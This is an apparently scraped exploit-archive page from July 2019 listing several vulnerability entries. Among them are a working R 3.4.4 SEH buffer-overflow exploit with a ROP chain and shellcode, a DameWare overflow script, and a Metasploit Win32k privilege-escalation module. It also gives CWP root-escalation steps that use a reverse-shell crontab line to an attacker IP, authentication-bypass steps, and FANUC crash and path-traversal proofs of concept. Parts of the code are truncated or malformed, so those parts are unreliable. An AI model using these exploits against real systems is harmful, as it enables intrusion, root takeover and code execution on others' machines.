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SAPUI5 1.0.0 / SAP Gateway 7.5 / 7.51 / 7.52 / 7.53 Content Spoofing


SAPUI5 version 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53are vulnerable to content spoofing in multiple parameters.

MD5 | 039a38b4ad196a156e5de1ace8468804

SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53 is
vulnerable to Content Spoofing in multiples parameters.



An attacker could thus mislead a user to believe this information is from
the legitimate service when it's not.


[VulnerabilityType Other]
Content Spoofing


[Vendor of Product]


[Affected Product]
SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53


Tested in SAPUI5 1.0.0



[Attack Type]



Offensive0Labs - Rafael Fontes Souza

References below:
"SAP Product Security Response Team
seg, 8 de jul 04:33 (há 6 dias)
para eu, SAP

Hello Rafael,

We are pleased to inform you that we are releasing the following security
note on July Patch Day 2019:

Sec Incident ID(s) 1870475251

Security Note 2752614

Security Note Title [CVE-2019-0319] Content Injection Vulnerability in SAP

Advisory Plan Date 10/09/2019

Delivery date of fix/Patch Day 07/09/2019

CVSS Base Score 4.3

CVSS Base Vector NLNR | U | NLN

Credits go to:

Offensive0Labs, Rafael Fontes Souza

*Notes will be visible to customers on 9th of July 2019.



R 3.4.4 (Windows 10 x64) Buffer Overflow


R version 3.4.4 (Windows 10 x64) SEH buffer overflow exploit with DEP/ASLR bypass.

MD5 | b5210f82925cd36b43862813470c3a0f

# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo

# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
import struct

outfile = 'payload.txt'

def create_rop_chain():
rop_gadgets = [
0x6c998f58, # POP EAX # RETN [R.dll]
0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
0x64c46010, # &Writable location [methods.dll]
0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0xffffffc0, # Value to negate, will become 0x00000040
0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0xfffffdff, # Value to negate, will become 0x00000201
0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x41414141, # Filler (compensate)
0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x6ca2a9bd, # & jmp esp [R.dll]
0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x90909090, # nop
0x6ca00e93, # POP EDI # RETN [R.dll]
0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]

return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

junk = "A" * 1016

seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} : # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python

nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode = ""
shellcode += "\x90" * 20
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
print "payload File Created\n"

DameWare Remote Support Buffer Overflow


DameWare Remote Support version Host SEH buffer overflow exploit.

MD5 | a51904aa9c36feff235373043d90d66a

#!/usr/bin/env python
# Author: Xavi Beltran
# Date: 11/07/2019
# Description:
# SEH based Buffer Overflow
# DameWare Remote Support V.
# CVE-2018-12897

# Contact: xavibeltran@protonmail.com
# Webpage: https://xavibel.com
# Tested on: Windows XP SP3 ESP

# Credit for Adam Jeffreys from Nettitude! :)

# Usage:
# Right click on a host >> AMT >> AMT Settings dialog
# Mark "Use SOCKS proxy" box
# Paste the string in the Host field

junk = "\x41" * 1672

# Unicode compatible padding
nseh = "\x61\x43"

# 007A007B - POP POP RET
seh = "\x7B\x7A"

align = ""
align += "\x05\x20\x11" # add eax,0x11002000
align += "\x71" # Venetian Padding
align += "\x2d\x19\x11" # sub eax,0x11001900
align += "\x71" # Venetian Padding
align += "\x50" # push eax
align += "\x71" # Venetian Padding
align += "\xC3" # RETN

padding = "\x41" * 11

junk2 = "\x41" * 870
junk3 = "\x41" * 2014

# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
# ./alpha2 eax --unicode --uppercase < shellcode.raw
# 508 bytes

crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3


CentOS Control Web Panel Privilege Escalation


CentOS Control Web Panel version suffers from a privilege escalation vulnerability.

MD5 | a9210bf1e43adfc4a34316bfb77c32ed

|| ||
|| CWP Control Web Panel - ||
|| Root Privilege Escalation ||
|| ||

# ====================================================================
# Information
# ====================================================================
# Exploit Title: CWP (CentOS Control Web Panel) < Root Privilege Escalation
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
version in the script)
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13359

Product : CWP Control Web Panel
Vulnerability Name : Root Privilege Escalation
version :
Fixed on :
Test on : Tested on: CentOS 7.6.1810 (Core)
Reference : http://centos-webpanel.com/
: https://control-webpanel.com/changelog
CVE-Number : CVE-2019-13359

# ====================================================================
# Root course of the vulnerability
# ====================================================================
1. The session file are store at /tmp directory
2. rkey value in the session file dose not change when access by the same source IP address

# ====================================================================
# Steps to Reproduce
# ====================================================================

Session prepareation state
1. Check the current IP address of attacker
2. Set the IP address on testing environment network
3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey"
5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)

* rkey is created from client ip, then do not change client ip when attack the real target

Attack state

# Method 1 Uploading via reverse shell

1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
2. Create session file through reverse shell

echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";"> /tmp/sess_123456

3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
4. Change file permission "chmod 664 /tmp/sess_123456"
5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
6. Open the URL and become the root user

# Method 2 Uploading via File manager function

1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
4. Open the URL and become the root user

*From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again

# ====================================================================
# PoC
# ====================================================================

# ====================================================================
# Timeline
# ====================================================================
2019-06-30: Discovered the bug
2019-06-30: Reported to vendor
2019-06-30: Vender accepted the vulnerability
2019-07-02: The vulnerability has been fixed
2019-07-06: Published

# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

CentOS Control Web Panel Authentication Bypass


CentOS Control Web Panel version suffers from an authentication bypass vulnerability.

MD5 | 010e4c768075759ac870b22afd37ce05

# Exploit Title: CWP (CentOS Control Web Panel) < Bypass Login
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13360, CVE-2019-13605

# ====================================================================
# Information
# ====================================================================

Product : CWP Control Web Panel
Vulnerability Name : User panel bypass Login
version :
Fixed on :
Test on : CentOS 7.6.1810 (Core)
Reference : http://centos-webpanel.com/
: https://control-webpanel.com/changelog
CVE-Number : CVE-2019-13605

# ====================================================================
# Root course of the vulnerability
# ====================================================================
After login success, the application will retuens base64 value and use it to authenticate again,
That allow attacker to modify the response and become a user

# ====================================================================
# Response format (version to
# ====================================================================


# CVE-2019-13360
# ====================================================================
# Steps to Reproduce Version to
# ====================================================================

1. Login with valid username and invalid password
2. Replace the target username in "<username>||/<username>/theme/original"
3. Convert to base64
4. Place the base64 value to HTTP response body
5. Gain access to user area

# CVE-2019-13605
# ====================================================================
# Steps to Reproduce Version to
# ====================================================================

1. Create a testing environment
1.1 Create user as a target username
1.2 Login as the user
1.3 Save the HTTP response body (token value)
2. Login to the real target with valid username and invalid password
3. Place the value we saved from step 1.3 in HTTP response body
4. Gain access to user area

*The response value format is depends on version, just replace the hole value

# ====================================================================
# PoC
# ====================================================================

# ====================================================================
# Timeline
# ====================================================================
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published

# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee

CentOS Control Web Panel User Enumeration


CentOS Control Web Panel version suffers from a user enumeration vulnerability.

MD5 | c0097370579f6ba471afee6e2a345e0b

# Exploit Title: CWP (CentOS Control Web Panel) < User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for lastest version
# Version: to
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================

Product : CWP Control Web Panel
version :
Fixed on :
Test on : CentOS 7.6.1810 (Core)
Reference : https://control-webpanel.com/
CVE-Number : 2019-13383

# ====================================================================
# Root course of the vulnerability
# ====================================================================
The server response different message between login with valid and invalid user.
This allows attackers to check whether a username is valid by reading the HTTP response.

# ====================================================================
# Steps to Reproduce
# ====================================================================

1. Login with a random user by using invalid password

POST /login/index.php?acc=validate HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close


2. Check the HTTP response body

2.1 User does not exist (server response suspended)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9


2.2 User does exist (server response nothing)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0

3. HTTP response body format depends on software version, but all of them keep responding differently as the example below

| Username | Password | Result |

| valid | valid | login success |

| valid | invalid | {"error":"failed"} |

| invalid | invalid | {"error":"user_invalid"} |

# ====================================================================
# PoC
# ====================================================================

# ====================================================================
# Timeline
# ====================================================================
2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published

# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Linux PTRACE_TRACEME Broken Permission / Object Lifetime Handling

Microsoft Windows NtUserSetWindowFNID Win32k User Callback


An elevation of privilege vulnerability exists in Microsoft Windows when the Win32k component fails to properly handle objects in memory. This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This Metasploit module is tested against Windows 10 v1703 x86.

MD5 | 410d26c4ad5d959638a9e5d77947143e

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper

def initialize(info={})
'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',
'Description' => %q{
An elevation of privilege vulnerability exists in Windows when the Win32k component
fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
Windows 10, Windows 10 Servers.

This module is tested against Windows 10 v1703 x86.
'License' => MSF_LICENSE,
'Author' => [
'ze0r', # Exploit analysis and PoC
'Kaspersky Lab', # Vulnerability discovery/detection
'Jacob Robles' # Metasploit module
'Platform' => 'win',
'Arch' => ARCH_X86,
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
'Targets' => [
[ 'Windows 10 v1703 (Build 15063) x86', {
'UniqueProcessIdOffset' => 180,
'TokenOffset' => 252,
'Version' => 'Windows 10 (Build 15063)'
'References' => [
['CVE', '2018-8453'],
['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
'Notes' => {
'Stability' => [CRASH_OS_RESTARTS]
'DisclosureDate' => '2018-10-09',
'DefaultTarget' => 0

def target_info
fail_with(Failure::None, 'Session is already elevated') if is_system?

unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
fail_with(Failure::NoTarget, 'Target is not compatible with exploit')

def write_file_to_target(fname, data)
tempdir = session.sys.config.getenv('TEMP')
file_loc = "#{tempdir}\\#{fname}"
vprint_warning("Attempting to write #{fname} to #{tempdir}")
write_file(file_loc, data)
vprint_good("#{fname} written")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")

def exploit
exe_name = 'CVE-2018-8453.exe'
exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
vprint_status("Reading payload from file #{exe_path}")
raw = File.read(exe_path)

tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
vprint_status("Uploading exploit exe as: #{tmp_exe}")
exe_rpath = write_file_to_target(tmp_exe, raw)

tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
vprint_status("Uploading payload #{tmp_payload}")

command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"

vprint_status("Executing command: #{command}")
session.sys.process.execute(command, nil, {'Hidden' => false})
print_good('Exploit finished, wait for privileged payload execution to complete.')

FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow


FANUC Robotics Virtual Robot Controller version 8.23 suffers from a stack-based buffer overflow vulnerability.

MD5 | 24accc856caa22d0d70441294d2efb6a

Hash: SHA512

Advisory ID: SYSS-2019-024
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Stack-based Buffer Overflow (CWE-121)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13585
Author of Advisory: Sebastian Hamann, SySS GmbH



FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to a stack-based buffer overflow, the remote admin web server
(vrimserve.exe) is vulnerable to denial-of-service and remote code
execution attacks.


Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A buffer overflow vulnerability was discovered in the log viewer
functionality. By sending a specially crafted HTTP request to the HTTP
server, the application can be crashed causing a denial-of-service

Remote code execution may also be possible, but was not confirmed
by SySS GmbH. Gaining control over the instruction pointer (EIP) of this
32 bit application by exploiting the stack-based buffer overflow
vulnerability was successful.


Proof of Concept (PoC):

SySS GmbH developed a proof-of-concept exploit that crashes
vrimserve.exe. It is to note that the exploit gives control over the EIP
register, which is an important prerequisite for remote code execution.

curl "http://${target_host}:8090/namedrobots/folder/dir/<1268 bytes>BBBBCCCCCCCCC"

The bytes denoted as B overwrite the EIP register.



The vendor has not yet released a security update.

It is recommended not making the remote admin web server (vrimserve.exe)
available to untrusted networks.


Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory



[1] Manufacturer website:
[2] SySS Security Advisory SYSS-2019-024
[3] SySS Responsible Disclosure Policy



This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


FANUC Robotics Virtual Robot Controller 8.23 Path Traversal


FANUC Robotics Virtual Robot Controller version 8.23 suffers from a path traversal vulnerability.

MD5 | e58d74e82f6894cd3957246d3cb268c5

Hash: SHA512

Advisory ID: SYSS-2019-025
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13584
Author of Advisory: Sebastian Hamann, SySS GmbH



FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to an insufficient validation of user input, the HTTP service of
the application is vulnerable to path traversal attacks.


Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A path traversal vulnerability was discovered in the log viewer

By sending a specially crafted HTTP request to the web server, files and
directories that match the pattern "*.*" can be listed anywhere on the
filesystem. Furthermore, the contents of files named "logfile.txt" can
be read.


Proof of Concept (PoC):

The string "..%5C" can be used to access the parent directory.

Therefore, by accessing a URL similar to the following, it is possible
to obtain a list of files (and directories with a . in their name) in
the root directory of the C:\ partition (or another partition, depending
on the software installation).




The vendor has not yet released a security update.

It is recommended not making the remote admin web server (vrimserve.exe)
available to untrusted networks.


Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory



[1] Manufacturer website:
[2] SySS Security Advisory SYSS-2019-025
[3] SySS Responsible Disclosure Policy



This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability


Apache WSS4J is prone to an information-disclosure vulnerability.

Successfully exploiting this issue can allow an attacker to obtain sensitive information that may aid in launching further attacks.


Bugtraq ID: 72553
Class: Design Error
CVE: CVE-2015-0226

Remote: Yes
Local: No
Published: Feb 10 2015 12:00AM
Updated: Jul 17 2019 05:00AM
Credit: The vendor reported this issue.
Vulnerable: Redhat JBoss Fuse 6.1.0
Redhat JBoss Enterprise Application Platform 6.3
Redhat JBoss A-MQ 6.1.0
Oracle PeopleSoft Enterprise PeopleTools 8.57
Oracle PeopleSoft Enterprise PeopleTools 8.56
Oracle PeopleSoft Enterprise PeopleTools 8.55
IBM WebSphere Application Server Liberty Profile
IBM WebSphere Application Server Liberty Profile
IBM WebSphere Application Server Liberty Profile
IBM WebSphere Application Server Liberty Profile
IBM WebSphere Application Server Liberty Profile
IBM WebSphere Application Server Liberty Profile 8.5
IBM Care management 6.0
IBM Cúram Social Program Management 6.0.5
IBM Cúram Social Program Management 6.0.4
IBM Cúram Social Program Management 6.1
IBM Cúram Social Program Management 6.0 SP2
IBM Cúram Social Program Management 5.2 SP6
Apache Wss4j 1.6.14
Apache Wss4j 2.0.1
Apache Wss4j 1.6.16
Apache Wss4j 1.6.15
Apache Wss4j 1.6.13
Apache Wss4j 1.6.12
Apache Wss4j 1.6.11
Apache Wss4j 1.6.10

Not Vulnerable: Redhat JBoss Fuse 6.2
Redhat JBoss Enterprise Application Platform 6.4
Redhat JBoss A-MQ 6.2
IBM WebSphere Application Server Liberty Profile
Apache Wss4j 2.0.2
Apache Wss4j 1.6.17


Attackers can use readily available tools to exploit this issue.

    Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability


    Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input.

    An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.

    Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.


    Bugtraq ID: 67121
    Class: Design Error
    CVE: CVE-2014-0114

    Remote: Yes
    Local: No
    Published: Apr 29 2014 12:00AM
    Updated: Jul 17 2019 07:00AM
    Credit: Rene Gielen
    Vulnerable: VMWare vCenter Server 5.5
    VMWare vCenter Server 5.1
    VMWare vCenter Server 5.0
    SuSE SUSE Linux Enterprise Software Development Kit 11 SP3
    SuSE Manager (for SLE 11 SP2) 1.7
    Redhat Network Satellite Server (for RHEL 6) 5.6
    Redhat Network Satellite Server (for RHEL 6) 5.5
    Redhat Network Satellite Server (for RHEL 6) 5.4
    Redhat JBoss Operations Network 3.2.1
    Redhat JBoss Fuse 6.1.0
    Redhat Fuse ESB Enterprise 7.1.0
    Redhat Enterprise Linux Desktop Workstation 5 client
    Redhat Enterprise Linux 5 Server
    Oracle Weblogic Server 12.1.3
    Oracle Weblogic Server 12.1.2 0
    Oracle Weblogic Server 12.1.1 0
    Oracle Weblogic Server 10.3.6 0
    Oracle Weblogic Server
    Oracle Weblogic Server
    Oracle Weblogic Server
    Oracle Weblogic Server
    Oracle Weblogic Server 10.0.2
    Oracle Weblogic Portal
    Oracle Weblogic Portal
    Oracle Weblogic Portal
    Oracle Waveset 8.1.1
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Utilities Framework
    Oracle Retail Returns Management 2.0
    Oracle Retail Returns Management 14.0
    Oracle Retail Returns Management 13.4
    Oracle Retail Returns Management 13.3
    Oracle Retail Returns Management 13.2
    Oracle Retail Returns Management 13.1
    Oracle Retail Markdown Optimization 13.4
    Oracle Retail Markdown Optimization 13.2
    Oracle Retail Markdown Optimization 13.1
    Oracle Retail Markdown Optimization 13.0
    Oracle Retail Markdown Optimization 12.0
    Oracle Retail Invoice Matching 14.1
    Oracle Retail Invoice Matching 14.0
    Oracle Retail Invoice Matching 13.2
    Oracle Retail Invoice Matching 13.1
    Oracle Retail Invoice Matching 13.0
    Oracle Retail Invoice Matching 12.1
    Oracle Retail Invoice Matching 12.0IN
    Oracle Retail Invoice Matching 12.0
    Oracle Retail Invoice Matching 11.0
    Oracle Retail Clearance Optimization Engine 14.0
    Oracle Retail Clearance Optimization Engine 13.4
    Oracle Retail Clearance Optimization Engine 13.3
    Oracle Retail Central Office 8.0
    Oracle Retail Central Office 14.0
    Oracle Retail Central Office 13.4
    Oracle Retail Central Office 13.3
    Oracle Retail Central Office 13.2
    Oracle Retail Central Office 13.1
    Oracle Retail Central Office 13.0
    Oracle Retail Central Office 12.0.9IN
    Oracle Retail Central Office 12.0
    Oracle Retail Back Office 8.0
    Oracle Retail Back Office 14.1
    Oracle Retail Back Office 14.0
    Oracle Retail Back Office 13.4
    Oracle Retail Back Office 13.3
    Oracle Retail Back Office 13.2
    Oracle Retail Back Office 13.1
    Oracle Retail Back Office 13.0
    Oracle Retail Back Office 12.0.9IN
    Oracle Retail Back Office 12.0
    Oracle Retail Allocation 13.2
    Oracle Retail Allocation 13.1
    Oracle Retail Allocation 13.0
    Oracle Retail Allocation 12.0
    Oracle Retail Allocation 11.0
    Oracle Retail Allocation 10.0
    Oracle Real-Time Decision Server
    Oracle Real-Time Decision Platform 3.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.4
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.3
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.1
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 7.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 16.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 16.1
    Oracle Primavera P6 Enterprise Project Portfolio Management 15.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 15.1
    Oracle Primavera Contract Management 14.0
    Oracle Primavera Contract Management 13.1
    Oracle Knowledge 8.5.1
    Oracle Knowledge 8.6.1
    Oracle Knowledge 8.6.0
    Oracle Knowledge
    Oracle JDeveloper 12.1.3 0
    Oracle JDeveloper 12.1.2 0.0
    Oracle JDeveloper 11.1.2 4.0
    Oracle JDeveloper 11.1.1 7.0
    Oracle JDeveloper
    Oracle Insurance IFRS 17 Analyzer 8.0.7
    Oracle Insurance IFRS 17 Analyzer 8.0.6
    Oracle Identity Manager 11.1.2 2
    Oracle Identity Manager 11.1.2 1.0
